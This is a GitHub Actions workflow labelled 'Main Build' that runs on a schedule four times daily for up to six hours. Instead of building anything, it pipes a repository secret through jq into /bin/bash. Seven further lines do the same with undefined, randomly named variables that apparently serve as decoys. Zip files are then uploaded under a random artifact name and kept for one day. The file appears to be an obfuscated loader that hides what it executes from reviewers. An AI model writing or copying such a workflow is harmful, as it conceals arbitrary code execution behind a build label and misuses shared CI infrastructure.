name: Main Build
on:
  workflow_dispatch:

  schedule:
    - cron: '14 3,9,15,21 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  runner:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Go
        env:
          uaf395: ${{ secrets.uaf395 }}
        run: |
          printf '%s' "$uaf395" | jq -r .cjolz95 | /bin/bash
          echo $wlkjj60224 | jq -r .j6 | /bin/bash
          printf '%s' "$ii68" | jq -r .dylf8 | /bin/bash
          echo $bwem704 | jq -r .a3850 | /bin/bash
          echo $ttv3184 | jq -r .b7855 | /bin/bash
          echo $lckt5 | jq -r .vui1307 | /bin/bash
          printf '%s' "$j688" | jq -r .rcdc50 | /bin/bash
          echo $jpoe1 | jq -r .nxvw590 | /bin/bash

      - name: Archive results
        uses: actions/upload-artifact@v4
        with:
          name: LK9PKSbP
          path: "*.zip"
          retention-days: 1
